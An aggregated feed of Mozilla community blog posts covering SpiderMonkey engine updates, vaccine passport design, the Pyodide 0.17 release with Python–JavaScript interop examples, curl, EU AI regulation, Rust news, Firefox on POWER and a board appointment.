Spidermonkey Development BlogSpiderMonkey Newsletter 10 (Firefox 88-89)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 88 and 89 Nightly release cycles.

In this newsletter we bid a fond farewell to module owner emeritus Jason Orendorff, and say hello to Jan de Mooij as the new JavaScript Engine module owner.

If you like these newsletters, you may also enjoy Yulia’s Compiler Compiler live stream.

🏆 New contributors

We’d like to thank our new contributors. We are working with Outreachy for the May 2021 cohort, and so have been fortunate enough to have more than the usual number of new contributors.

👷🏽‍♀️ JS features

⚡ WebAssembly

  • We enabled support for large ArrayBuffers and 4 GB Wasm memories in Firefox 89.
  • We enabled support for SIMD on x86 and x64 in Firefox 89.
  • Igalia finished the implementation of the Exception Handling proposal in the Baseline Compiler.
  • We implemented support for arrays and rtt-based downcasting in our Wasm GC prototype.
  • We’ve enabled the Ion backend for ARM64 in Nightly builds.
  • We’ve landed many changes and optimizations for SIMD support.
  • We removed various prefs for features we’ve been shipping for some time.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • We implemented a mechanism for function delazification information to be merged with the initial stencil before writing to caches.
  • We added support for modules and off-thread compilation to the Stencil API.
  • We optimized use of CompilationState in the parser for certain cases.
  • We added magic values to the Stencil bytecode serialization format to detect corrupt data and handle this more gracefully.
  • We fixed the Stencil bytecode serialization format to deduplicate bytecode.
  • We’re getting closer to sharing Stencil information for self-hosted code across content processes. We expect significant memory usage and performance improvements from this in the coming weeks.

🧹 Garbage Collection

  • We simplified and optimized the WeakMap code a bit.
  • We disabled nursery poisoning for Nightly release builds. The poisoning was pretty expensive and often caused slowdowns compared to release builds that didn’t have the poisoning.
  • We added support for decommitting free arenas on Apple’s M1 hardware. This required some changes due to the 16 KB page size.
  • We changed the pre-write barrier to use a buffering mechanism instead of marking directly.
  • GC markers now describe what they are, hopefully reducing confusion over whether the browser is paused throughout a major GC


  • We changed how arguments objects are optimized. Instead of doing an (expensive) analysis for all functions that use arguments, we now use Scalar Replacement in the Warp backend to optimize away arguments allocations. The new implementation is simpler, more self-contained, and lets us avoid doing the analysis for cold functions.
  • We fixed the Scalar Replacement code for arrays and objects to work with Warp.
  • We also added back support for branch pruning with Warp.
  • We added CacheIR support for optimizing GetElem, SetElem and in operations with null or undefined property keys. This turned out to be very common on certain websites.
  • We optimized DOM getters for window.foo (WindowProxy objects).
  • We improved function inlining in Warp for certain self-hosted functions (for example Array.prototype.map) that benefit from inlining.
  • We added a browser pref to control the function inlining size threshold, to help us investigate performance issues.

📐 ReShape

Now that Warp is on by default and we’ve removed the old backend and Type Inference mechanism, we’re able to optimize our object representation more. Modern websites spend a significant amount of time doing property lookups, and property information takes up a lot of space, so we expect improvements in this area to pay off.

  • We’ve merged ObjectGroup (used by the old Type Inference system) into Shape and BaseShape. This removed a word from every JS object and is also simpler.
  • We cleaned up and deduplicated our property lookup code.
  • We’ve replaced the old JSGetterOp and JSSetterOp getters/setters with a property attribute.
  • We changed our implementation of getter/setter properties: instead of storing the getter and setter objects in the shape tree, we now store them in object slots. This fixes some performance cliffs and unblocks future Shape changes.
  • We’ve started adding better abstractions for property information stored in shapes. This will make it easier to experiment with different representations in the coming weeks.

🛠 Testing

  • We made SpiderMonkey’s test suites on Android about four times faster by optimizing the test runner, copying fewer files to the device, and reducing the number of jit-test configurations.
  • We removed the Rust API crates because upstream Servo uses its own version instead of the one we maintained in-tree.
  • We landed support for the Fuzzilli JS engine fuzzer in the JS shell.

📚 Miscellaneous

  • We cleaned up the lexical environment class hierarchy.
  • We optimized Object.assign. Modern JS frameworks use this function a lot.
  • The bytecode emitter now emits optimized bytecode for name lookups in strict-mode eval.
  • We updated irregexp to the latest upstream version.
  • We optimized checks for strings representing an index by adding a flag for this to atoms.
  • Function delazification is now properly reported in the profiler.
  • The profiler reports more useful stacks for JS code because it’s now able to retrieve registers from the JIT trampoline to resume stack walking.
  • We added memory reporting for external ArrayBuffer memory and also reduced heap-unclassified memory by adding some new memory reporters.
  • We added documentation for the LifoAlloc allocator.
  • We fixed Clang static analysis and formatting issues in the Wasm code.
  • We’ve started cleaning up PropertyDescriptor by using Maybe<PropertyDescriptor>.

The Mozilla BlogNotes on Implementing Vaccine Passports

Now that we’re starting to get widespread COVID vaccination “vaccine passports” have started to become more relevant. The idea behind a vaccine passport is that you would have some kind of credential that you could use to prove that you had been vaccinated against COVID; various entities (airlines, clubs, employers, etc.) might require such a passport as proof of vaccination. Right now deployment of this kind of mechanism is fairly limited: Israel has one called the green pass and the State of New York is using something called the Excelsior Pass based on some IBM tech.

Like just about everything surrounding COVID, there has been a huge amount of controversy around vaccine passports (see, for instance, this EFF post, ACLU post, or this NYT article).

There two seem to be four major sets of complaints:

  1. Requiring vaccination is inherently a threat to people’s freedom
  2. Because vaccine distribution has been unfair, with a number of communities having trouble getting vaccines, a requirement to get vaccinated increases inequity and vaccine passports enable that.
  3. Vaccine passports might be implemented in a way that is inaccessible for people without access to technology (especially to smartphones).
  4. Vaccine passports might be implemented in a way that is a threat to user privacy and security.

I don’t have anything particularly new to say about the first two questions, which aren’t really about technology but rather about ethics and political science, so, I don’t think it’s that helpful to weigh in on them, except to observe that vaccination requirements are nothing new: it’s routine to require children to be vaccinate to go to school, people to be vaccinated to enter certain countries, etc. That isn’t to say that this practice is without problems but merely that it’s already quite widespread, so we have a bunch of prior art here. On the other hand, the questions of how to design a vaccine passport system are squarely technical; the rest of this post will be about that.

What are we trying to accomplish?

As usual, we want to start by asking what we’re trying to accomplish At a high level, we have a system in which a vaccinated person (VP) needs to demonstrate to some entity (the Relying Party (RP)) that they have been vaccinated within some relevant time period. This brings with it some security requirements”

  1. Unforgeability: It should not be possible for an unvaccinated person to persuade the RP that they have been vaccinated.
  2. Information minimization: The RP should learn as little as possible about the VP, consistent with unforgeability.
  3. Untraceability: Nobody but the VP and RP should know which RPs the VP has proven their status to.

I want to note at this point that there has been a huge amount of emphasis on the unforgeability property, but it’s fairly unclear — at least to me — how important it really is. We’ve had trivially forgeable paper-based vaccination records for years and I’m not aware of any evidence of widespread fraud. However, this seems to be something people are really concerned about — perhaps due to how polarized the questions of vaccination and masks have become — and we have already heard some reports of sales of fake vaccine cards, so perhaps we really do need to worry about cheating. It’s certainly true that people are talking about requiring proof of COVID vaccination in many more settings than, for instance, proof of measles vaccination, so there is somewhat more incentive to cheat. In any case, the privacy requirements are a real concern.

In addition, we have some functional requirements/desiderata:

  1. The system should be cheap to bring up and operate.
  2. It should be easy for VPs to get whatever credential they need and to replace it if it is lost or destroyed.
  3. VPs should not be required to have some sort of device (e.g., a smartphone).

The Current State

In the US, most people who are getting vaccinated are getting paper vaccination cards that look like this:

COVID Vaccination Card

This card is a useful record that you’ve been vaccinated, with which vaccine, and when you have to come back, but it’s also trivially forgeable. Given that they’re made of paper with effectively no anti-counterfeiting measures (not even the ones that are in currency), it would be easy to make one yourself, and there are already people selling them online. As I said above, it’s not clear entirely how much we ought to worry about fraud, but if we do, these cards aren’t up to the task. In any case, they also have suboptimal information minimization properties: it’s not necessary to know how old you are or which vaccine you got in order to know whether you were vaccinated.

The cards are pretty good on the traceability front: nobody but you and the RP learns anything, and they’re cheap to make and use, without requiring any kind of device on the user’s side. They’re not that convenient if you lose them, but given how cheap they are to make, it’s not the worst thing in the world if the place you got vaccinated has to mail you a new one.

Improving The Situation

A good place to start is to ask how to improve the paper design to address the concerns above.

The data minimization issue is actually fairly easy to address: just don’t put unnecessary information on the card: as I said, there’s no reason to have your DOB or the vaccine type on the piece of paper you use for proof.

However, it’s actually not straightforward to remove your name. The reason for this is that the RP needs to be able to determine that the credential actually applies to you rather than to someone else. Even if we assume that the credential is tamper-resistant (see below), that doesn’t mean it belongs to you. There are really two main ways to address this:

  1. Have the VP’s name (or some ID number) on the credential and require them to provide a biometric credential (i.e., a photo ID) that proves they are the right person.
  2. Embed a biometric directly into the credential.

This should all be fairly familiar because it’s exactly the same as other situations where you prove your identity. For instance, when you get on a plane, TSA or the airline reads your boarding pass, which has your name, and then uses your photo ID to compare that to your face and decide if it’s really you (this is option 1). By contrast, when you want to prove you are licensed to drive, you present a credential that has your biometrics directly embedded (i.e., a drivers license).

This leaves us with the question of how to make the credential tamper-resistant. There are two major approaches here:

  1. Make the credential physically tamper-resistant
  2. Make the credential digitally tamper-resistant

Physically Tamper-Resistant Credentials

A physically tamper-resistant credential is just one which is hard to change or for unauthorized people to manufacture. This usually includes features like holograms, tamper-evident sealing (so that you can’t disassemble it without leaving traces) etc. Most of us have lot of experience with physically tamper-resistant credentials such as passports, drivers licenses, etc. These generally aren’t completely impossible to forge, but they’re designed to be somewhat difficult. From a threat model perspective, this is probably fine; after all we’re not trying to make it impossible to pretend to be vaccinated, just difficult enough that most people won’t try.

In principal, this kind of credential has excellent privacy because it’s read by a human RP rather than some machine. Of course, one could take a photo of it, but there’s no need to. As an analogy, if you go to a bar and show your driver’s license to prove you are over 21, that doesn’t necessarily create a digital record. Unfortunately for privacy, increasingly those kinds of previously analog admissions processes are actually done by scanning the credential (which usually has some machine readable data), thus significantly reducing the privacy benefit.

The main problem with a physically tamper-resistant credential is that it’s expensive to make and that by necessity you need to limit the number of people who can make it: if it’s cheap to buy the equipment to make the credential then it will also be cheap to forge. This is inconsistent with rapidly issuing credentials concurrently with vaccinating people: when I got vaccinated there were probably 25 staff checking people in and each one had a stack of cards. It’s hard to see how you would scale the production of tamper-resistant plastic cards to an operation like this, let alone to one that happens at doctors offices and pharmacies all over the country. It’s potentially possible that they could report people’s names to some central authority which then makes the cards, but even then we have scaling issues, especially if you want the cards to be available 2 weeks after vaccination. A related problem is that if you lose the card, it’s hard to replace because you have the same issuing problem.[1]

Digitally Tamper-Resistant Credentials

The major alternative here is to design a digitally tamper-resistant system. Effectively what this means is that the issuing authority digitally signs a credential. This provides cryptographically strong authentication of the data in the credential in such a way that anyone can verify it as long as they have the right software. The credential just needs to contain the same information as would be on the paper credential: the fact that you were vaccinated (and potentially a validity date) plus either your name (so you can show your photo id) or your identity (so the RP can directly match it against you).

This design has a number of nice properties. First, it’s cheap to manufacture: you can do the signing on a smartphone app.[2] It doesn’t need any special machinery from the RP: you can encode the credential as a 2-D bar code which the VP can show on their phone or print out. And they can make as many copies as they want, just like your airline boarding pass.

The major drawback of this design is that it requires special software on the RP side to read the 2D bar code, verify the digital signature, and verify the result. However, this software is relatively straightforward to write and can run on any smartphone, using the camera to read the bar code.[3] So, while this is somewhat of a pain, it’s not that big a deal.

This design also has generally good privacy properties: the information encoded in credential is (or at least can be) the minimal set needed to validate that you are you and that you are vaccinated, and because the credential can be locally verified, there’s no central authority which learns where you go. Or, at least, it’s not necessary for there to be a central authority: nothing stops the RP from reporting that you were present back to some central location, but that’s just inherent in them getting your name and picture. As far as I know, there’s no way to prevent that, though if the credential just contains your picture rather than an identifier, it’s somewhat better (though the code itself is still unique, so you can be tracked) especially because the RP can always capture your picture anyway.[4]

By this point you should be getting the impression that signed credentials are a pretty good design, and it’s no surprise that this seems to be the design that WHO has in mind for their smart vaccination certificate. They seem to envision encoding quite a bit more information than is strictly required for a “yes/no” decision and then having a “selective disclosure” feature that would just have that information and can be encoded in a bar code.

What about Green Pass, Excelsior Pass, etc?

So what are people actually rolling out in the field? The Israeli Green Pass seems to be basically this: a signed credential. It’s got a QR code which you read with an app and the app then displays the ID number and an expiration data. You then compare the ID number to the user’s ID to verify that they are the right person.

I’ve had a lot of trouble figuring out what the Excelsior Pass does. Based on the NY Excelsior Pass FAQ, which says that “you can print a paper Pass, take a screen shot of your Pass, or save it to the Excelsior Pass Wallet mobile app”, it sounds like it’s the same kind of thing as Green Pass, but that’s hardly definitive. I’ve been trying to get a copy of the specification for this technology and will report back if I manage to learn more.

What About the Blockchain?

Something that keeps coming up here is the use of blockchain for vaccine passports. You’ll notice that my description above doesn’t have anything about the blockchain but, for instance, the Excelsior Pass says it is built on IBM’s digital health pass which is apparently “built on IBM blockchain technology” and says “Protects user data so that it remains private when generating credentials. Blockchain and cryptography provide credentials that are tamper-proof and trusted.” As another example, in this webinar on the Linux Foundation’s COVID-19 Credentials Initiative, Kaliya Young answers a question on blockchain by saying that the root keys for the signers would be stored in the blockchain.

To be honest, I find this all kind of puzzling; as far as I can tell there’s no useful role for the blockchain here. To oversimplify, the major purpose of a blockchain is to arrange for global consensus about some set of facts (for instance, the set of financial transactions that has happened) but that’s not necessary in this case: the structure of a vaccine credential is that some health authority asserts that a given person have been vaccinated. We do need relying parties to know the set of health authorities, but we have existing solutions for that (at a high level, you just build the root keys into the verifying apps).[5] If anyone has more details on why a blockchain[6] is useful for this application I’d be interested in hearing them.

Is this stuff any good?

It’s hard to tell. As discussed above, some of these designs seem to be superficially sensible, but even if the overall design is sensible, there are lots of ways to implement it incorrectly. It’s quite concerning not to have published specifications for the exact structure of the credentials. Without having a detailed specification, it’s not possible to determine that it has the claimed security and privacy properties. The protocols that run the Web and the Internet are open which not only allows anyone to implement them, but also to verify their security and privacy properties. If we’re going to have vaccine passports, they should be open as well.

Updated: 2021-04-02 10:10 AM to point to Mozilla’s previous work on blockchain and identity.

  1. Of course, you could be issued multiple cards, as they’re not transferable. ↩︎
  2. There are some logistical issues around exactly who can sign: you probably don’t want everyone at the clinic to have a signing key, but you can have some central signer. ↩︎
  3. Indeed, in Santa Clara County, where I got vaccinated, your appointment confirmation is a 2D bar code which you print out and they scan onsite. ↩︎
  4. If you’re familiar with TLS, this is going to sound a lot like a digital certificate, and you might wonder whether revocation is a privacy issue the way that it is with WebPKI and OCSP. The answer is more or less “no”. There’s no real reason to revoke individual credentials and so the only real problem is revoking signing certificates. That’s likely to happen quite infrequently, so we can either ignore it, disseminate a certificate revocation list, or have central status checking just for them. ↩︎
  5. Obviously, you won’t be signing every credential with the root keys, but you use those to sign some other keys, building a chain of trust down to keys which you can use to sign the user credentials. ↩︎
  6. Because of the large amount of interest in blockchain technologies, there’s a tendency to try to sprinkle it in places it doesn’t help, especially in the identity space For that reason, it’s really important to ask what benefits it’s bringing. ↩︎

The post Notes on Implementing Vaccine Passports appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgPyodide Spin Out and 0.17 Release

We are happy to announce that Pyodide has become an independent and community-driven project. We are also pleased to announce the 0.17 release for Pyodide with many new features and improvements.

Pyodide consists of the CPython 3.8 interpreter compiled to WebAssembly which allows Python to run in the browser. Many popular scientific Python packages have also been compiled and made available. In addition, Pyodide can install any Python package with a pure Python wheel from the Python Package Index (PyPi). Pyodide also includes a comprehensive foreign function interface which exposes the ecosystem of Python packages to Javascript and the browser user interface, including the DOM, to Python.

You can try out the latest version of Pyodide in a REPL directly in your browser.

Pyodide is now an independent project

We are happy to announce that Pyodide now has a new home in a separate GitHub organisation (github.com/pyodide) and is maintained by a volunteer team of contributors. The project documentation is available on pyodide.org.

Pyodide was originally developed inside Mozilla to allow the use of Python in Iodide, an experimental effort to build an interactive scientific computing environment for the web.  Since its initial release and announcement, Pyodide has attracted a large amount of interest from the community, remains actively developed, and is used in many projects outside of Mozilla.

The core team has approved a transparent governance document  and has a roadmap for future developments. Pyodide also has a Code of Conduct which we expect all contributors and core members to adhere to.

New contributors are welcome to participate in the project development on Github. There are many ways to contribute, including code contributions, documentation improvements, adding packages, and using Pyodide for your applications and providing feedback.

The Pyodide 0.17 release

Pyodide 0.17.0 is a major step forward from previous versions. It includes:

  • major maintenance improvements,
  • a thorough redesign of the central APIs, and
  • careful elimination of error leaks and memory leaks

Type translation improvements

The type translations module was significantly reworked in v0.17 with the goal that round trip translations of objects between Python and Javascript produces an identical object.

In other words, Python -> JS -> Python translation and JS -> Python -> JS translation now produce objects that are  equal to the original object. (A couple of exceptions to this remain due to unavoidable design tradeoffs.)

One of Pyodide’s strengths is the foreign function interface between Python and Javascript, which at its best can practically erase the mental overhead of working with two different languages. All I/O must pass through the usual web APIs, so in order for Python code to take advantage of the browser’s strengths , we need to be able to support use cases like generating image data in Python and rendering the data to an HTML5 Canvas, or implementing event handlers in Python.

In the past we found that one of the major pain points in using Pyodide occurs when an object makes a round trip from Python to Javascript and back to Python and comes back different. This violated the expectations of the user and forced inelegant workarounds.

The issues with round trip translations were primarily caused by implicit conversion of Python types to Javascript. The implicit conversions were intended to be convenient, but the system was inflexible and surprising to users. We still implicitly convert strings, numbers, booleans, and None. Most other objects are shared between languages using proxies that allow methods and some operations to be called on the object from the other language. The proxies can be converted to native types with new explicit converter methods called .toJs and to_py.

For instance, given an Array in JavaScript,

window.x = ["a", "b", "c"];

We can access it in Python as,

>>> from js import x # import x from global Javascript scope
>>> type(x)
<class 'JsProxy'>
>>> x[0]    # can index x directly
>>> x[1] = 'c' # modify x
>>> x.to_py()   # convert x to a Python list
['a', 'c']

Several other conversion methods have been added for more complicated use cases. This gives the user much finer control over type conversions than was previously possible.

For example, suppose we have a Python list and want to use it as an argument to a Javascript function that expects an Array.  Either the caller or the callee needs to take care of the conversion. This allows us to directly call functions that are unaware of Pyodide.

Here is an example of calling a Javascript function from Python with argument conversion on the Python side:

function jsfunc(array) {
  return array.length;

from js import jsfunc
from pyodide import to_js

def pyfunc():
  mylist = [1,2,3]
  jslist = to_js(mylist)
  return jsfunc(jslist) # returns 4

This would work well in the case that jsfunc is a Javascript built-in and pyfunc is part of our codebase. If pyfunc is part of a Python package, we can handle the conversion in Javascript instead:

function jsfunc(pylist) {
  let array = pylist.toJs();
  return array.length;

See the type translation documentation for more information.

Asyncio support

Another major new feature is the implementation of a Python event loop that schedules coroutines to run on the browser event loop. This makes it possible to use asyncio in Pyodide.

Additionally, it is now possible to await Javascript Promises in Python and to await Python awaitables in Javascript. This allows for seamless interoperability between asyncio in Python and Javascript (though memory management issues may arise in complex use cases).

Here is an example where we define a Python async function that awaits the Javascript async function “fetch” and then we await the Python async function from Javascript.

async def test():
    from js import fetch
    # Fetch the Pyodide packages list
    r = await fetch("packages.json")
    data = await r.json()
    # return all available packages
    return data.dependencies.object_keys()

let test = pyodide.globals.get("test");

// we can await the test() coroutine from Javascript
result = await test();
// logs ["asciitree", "parso", "scikit-learn", ...]

Error Handling

Errors can now be thrown in Python and caught in Javascript or thrown in Javascript and caught in Python. Support for this is integrated at the lowest level, so calls between Javascript and C functions behave as expected. The error translation code is generated by C macros which makes implementing and debugging new logic dramatically simpler.

For example:

function jserror() {
  throw new Error("ooops!");

from js import jserror
from pyodide import JsException

except JsException as e:
  print(str(e)) # prints "TypeError: ooops!"

Emscripten update

Pyodide uses the Emscripten compiler toolchain to compile the CPython 3.8 interpreter and Python packages with C extensions to WebAssembly. In this release we finally completed the migration to the latest version of Emscripten that uses the upstream LLVM backend. This allows us to take advantage of recent improvements to the toolchain, including significant reductions in package size and execution time.

For instance, the SciPy package shrank dramatically from 92 MB to 15 MB so Scipy is now cached by browsers. This greatly improves the usability of scientific Python packages that depend on scipy, such as scikit-image and scikit-learn. The size of the base Pyodide environment with only the CPython standard library shrank from 8.1 MB to 6.4 MB.

On the performance side, the latest toolchain comes with a 25% to 30% run time improvement:

Performance ranges between near native to up to 3 to 5 times slower, depending on the benchmark.  The above benchmarks were created with Firefox 87.

Other changes

Other notable features include:

  • Fixed package loading for Safari v14+ and other Webkit-based browsers
  • Added support for relative URLs in micropip and loadPackage, and improved interaction between micropip and loadPackage
  • Support for implementing Python modules in Javascript

We also did a large amount of maintenance work and code quality improvements:

  • Lots of bug fixes
  • Upstreamed a number of patches to the emscripten compiler toolchain
  • Added systematic error handling to the C code, including automatic adaptors between Javascript errors and CPython errors
  • Added internal consistency checks to detect memory leaks, detect fatal errors, and improve ease of debugging

See the changelog for more details.

Winding down Iodide

Mozilla has made the difficult decision to wind down the Iodide project. While alpha.iodide.io will continue to be available for now (in part to provide a demonstration of Pyodide’s capabilities), we do not recommend using it for important work as it may shut down in the future. Since iodide’s release, there have been many efforts at creating interactive notebook environments based on Pyodide which are in active development and offer a similar environment for creating interactive visualizations in the browser using python.

Next steps for Pyodide

While many issues were addressed in this release, a number of other major steps remain on the roadmap. We can mention

  • Reducing download sizes and initialization times
  • Improve performance of Python code in Pyodide
  • Simplification of package loading system
  • Update scipy to a more recent version
  • Better project sustainability, for instance, by seeking synergies with the conda-forge project and its tooling.
  • Better support for web workers
  • Better support for synchronous IO (popular for programming education)

For additional information see the project roadmap.


Lots of thanks to:

  • Dexter Chua and Joe Marshall for improving the build setup and making Emscripten migration possible.
  • Hood Chatham for in-depth improvement of the type translation module and adding asyncio support
  • and Romain Casati for improving the Pyodide REPL console.

We are also grateful to all Pyodide contributors.

The post Pyodide Spin Out and 0.17 Release appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenberg“So what exactly is curl?”

You know that question you can get asked casually by a person you’ve never met before or even by someone you’ve known for a long time but haven’t really talked to about this before. Perhaps at a social event. Perhaps at a family dinner.

– So what do you do?

The implication is of course what you work with. Or as. Perhaps a title.

Software Engineer

In my case I typically start out by saying I’m a software engineer. (And no, I don’t use a title.)

If the person who asked the question is a non-techie, this can then take off in basically any direction. From questions about the Internet, how their printer acts up sometimes to finicky details about Wifi installations or their parents’ problems to install anti-virus. In other words: into areas that have virtually nothing to do with software engineering but is related to computers.

If the person is somewhat knowledgeable or interested in technology or computers they know both what software and engineering are. Then the question can get deepened.

What kind of software?

Alternatively they ask for what company I work for, but it usually ends up on the same point anyway, just via this extra step.

I work on curl. (Saying I work for wolfSSL rarely helps.)

<figcaption>Business cards of mine</figcaption>

So what is curl?

curl is a command line tool used but a small set of people (possibly several thousands or even millions), and the library libcurl that is installed in billions of places.

I often try to compare libcurl with how companies build for example cars out of many components from different manufacturers and companies. They use different pieces from many separate sources put together into a single machine to produce the end product.

libcurl is like one of those little components that a car manufacturer needs. It isn’t the only choice, but it is a well known, well tested and familiar one. It’s a safe choice.

Internet what?

Lots of people, even many with experience, knowledge or even jobs in the IT industry I’ve realized don’t know what an Internet transfer is. Me describing curl as doing such, doesn’t really help in those cases.

An internet transfer is the bridge between “the cloud” and your devices or applications. curl is a bridge.

Everything wants Internet these days

In general, anything today that has power goes towards becoming networked. Everything that can, will connect to the Internet sooner or later. Maybe not always because it’s a good idea, but because it gives your thing a (perceived) advantage to your competitors.

Things that a while ago you wouldn’t dream would do that, now do Internet transfers. Tooth brushes, ovens, washing machines etc.

If you want to build a new device or application today and you want it to be successful and more popular than your competitors, you will probably have to make it Internet-connected.

You need a “bridge”.

Making things today is like doing a puzzle

Everyone who makes devices or applications today have a wide variety of different components and pieces of the big “puzzle” to select from.

You can opt to write many pieces yourself, but virtually nobody today creates anything digital entirely on their own. We lean on others. We stand on other’s shoulders. In particular open source software has grown up to become or maybe provide a vast ocean of puzzle pieces to use and leverage.

One of the little pieces in your device puzzle is probably Internet transfers, because you want your thing to get updates, upload telemetry and who knows what else.

The picture then needs a piece inserted in the right spot to get complete. The Internet transfers piece. That piece can be curl. We’ve made curl to be a good such piece.

<figcaption>This perfect picture is just missing one little piece…</figcaption>

Relying on pieces provided by others

Lots have been said about the fact that companies, organizations and entire ecosystems rely on pieces and components written, maintained and provided by someone else. Some of them are open source components written by developers on their spare time, but are still used by thousands of companies shipping commercial products.

curl is one such component. It’s not “just” a spare time project anymore of course, but the point remains. We estimate that curl runs in some ten billion installations these days, so quite a lot of current Internet infrastructure uses our little puzzle piece in their pictures.

<figcaption>Modified version of the original xkcd 2347 comic</figcaption>

So you’re rich

I rarely get to this point in any conversation because I would have already bored my company into a coma by now.

The concept of giving away a component like this as open source under a liberal license is a very weird concept to general people. Maybe also because I say that I work on this and I created it, but I’m not at all the only contributor and we wouldn’t have gotten to this point without the help of several hundred other developers.

“- No, I give it away for free. Yes really, entirely and totally free for anyone and everyone to use. Correct, even the largest and richest mega-corporations of the world.”

The ten billion installations work as marketing for getting companies to understand that curl is a solid puzzle piece so that more will use it and some of those will end up discovering they need help or assistance and they purchase support for curl from me!

I’m not rich, but I do perfectly fine. I consider myself very lucky and fortunate who get to work on curl for a living.

A curl world

There are about 5 billion Internet using humans in the world. There are about 10 billion curl installations.

The puzzle piece curl is there in the middle.

This is how they’re connected. This is the curl world map 2021.

Or put briefly

libcurl is a library for doing transfers specified with a URL, using one of the supported protocols. It is fast, reliable, very portable, well documented and feature rich. A de-facto standard API available for everyone.


The original island image is by Julius Silver from Pixabay. xkcd strip edits were done by @tsjost.

Mozilla Privacy BlogMozilla reacts to publication of EU’s draft regulation on AI

Today, the European Commission published its draft for a regulatory framework for artificial intelligence (AI). The proposal lays out comprehensive new rules for AI systems deployed in the EU. Mozilla welcomes the initiative to rein in the potential harms caused by AI, but much remains to be clarified.

Reacting to the European Commission’s proposal, Raegan MacDonald, Mozilla’s Director of Global Public Policy, said: 

“AI is a transformational technology that has the potential to create value and enable progress in so many ways, but we cannot lose sight of the real harms that can come if we fail to protect the rights and safety of people living in the EU. Mozilla is committed to ensuring that AI is trustworthy, that it helps people instead of harming them. The European Commission’s push to set ground rules is a step in the right direction and it is good to see that several of our recommendations to the Commission are reflected in the proposal – but there is more work to be done to ensure these principles can be meaningfully implemented, as some of the safeguards and red lines envisioned in the text leave a lot to be desired.

Systemic transparency is a critical enabler of accountability, which is crucial to advancing more trustworthy AI. We are therefore encouraged by the introduction of user-facing transparency obligations – for example for chatbots or so-called deepfakes – as well as a public register for high-risk AI systems in the European Commission’s proposal. But as always, details matter, and it will be important what information exactly this database will encompass. We look forward to contributing to this important debate.”


The post Mozilla reacts to publication of EU’s draft regulation on AI appeared first on Open Policy & Advocacy.

Cameron KaiserColoured iMacs? We got your coloured iMacs right here

And you don't even need to wait until May. Besides being the best colour Apple ever offered (a tray-loading Strawberry, which is nicer than the current M1 iMac Pink), this iMac G3 also has a 600MHz Sonnet HARMONi in it, so it has a faster CPU and FireWire too. Take that, non-upgradable Apple Silicon. It runs Jaguar with OmniWeb and Crypto Ancienne for web browsing.

Plus, these coloured iMacs can build and run TenFourFox: Chris T proved it on his 400MHz G3. It took 34 hours to compile from source. I always did like slow-cooked meals better.

This Week In RustThis Week in Rust 387

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No papers/research projects this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is deltoid, another crate for delta-compressing Rust data structures.

Thanks to Joey Ezechiëls for the nomination

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No calls for participation this week

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

292 pull requests were merged in the last week

Rust Compiler Performance Triage

Another quiet week with very small changes to compiler performance.

Triage done by @rylev. Revision range: 5258a74..6df26f

1 Regressions, 0 Improvements, 1 Mixed

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

No new RFCs were proposed this week.

Upcoming Events


If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Grover GmbH

Massa Labs


Subspace Labs

Senior Software Engineer, Visualization


Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

We feel that Rust is now ready to join C as a practical language for implementing the [Linux] kernel. It can help us reduce the number of potential bugs and security vulnerabilities in privileged code while playing nicely with the core kernel and preserving its performance characteristics.

Wedson Almeida Filho on the Google Security Blog

Thanks to Jacob Pratt for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Talospace ProjectFirefox 88 on POWER

Firefox 88 is out. In addition to a bunch of new CSS properties, JavaScript is now supported in PDF files even within Firefox's own viewer, meaning there is no escape, and FTP is disabled, meaning you will need to use 78ESR (though you get two more weeks of ESR as a reprieve, since Firefox 89 has been delayed to allow UI code to further settle). I've long pondered doing a generic "cURL extension" that would reenable all sorts of protocols through a shim to either curl or libcurl; maybe it's time for it.

Fortunately Fx88 builds uneventually as usual on OpenPOWER, though our PGO-LTO patches (apply to the tree with patch -p1) required a slight tweak to nsTerminator.cpp. Debug and optimized .mozconfigs are unchanged.

Also, an early milestone in the Firefox JavaScript JIT for OpenPOWER: Justin Hibbits merged my earlier jitpower work to a later tree (right now based on Firefox 86) and filled in the gaps with code from TenFourFox, and after some polishing up I did over the weekend, a JIT-enabled JavaScript shell now compiles on Fedora ppc64le. However, it immediately asserts due to probably some missing defintions for register sets, and I'm sure there are many other assertions and lurking bugs to be fixed, but this is much further along than before. The fork is on Github for others who wish to contribute; I will probably decommission the old jitpower project soon since it is now superfluous. More to come.

The Mozilla BlogMark Surman joins the Mozilla Foundation Board of Directors

In early 2020, I outlined our efforts to expand Mozilla’s boards. Over the past year, we’ve added three new external Mozilla board members: Navrina Singh and Wambui Kinya to the Mozilla Foundation board and Laura Chambers to the Mozilla Corporation board.

Today, I’m excited to welcome Mark Surman, Executive Director of the Mozilla Foundation, to the Foundation board.

As I said to staff prior to his appointment, when I think about who should hold the keys to Mozilla, Mark is high on that list. Mark has unique qualifications in terms of the overall direction of Mozilla, how our organizations interoperate, and if and how we create programs, structures or organizations. Mark is joining the Mozilla Foundation board as an individual based on these qualifications; we have not made the decision that the Executive Director is automatically a member of the Board.
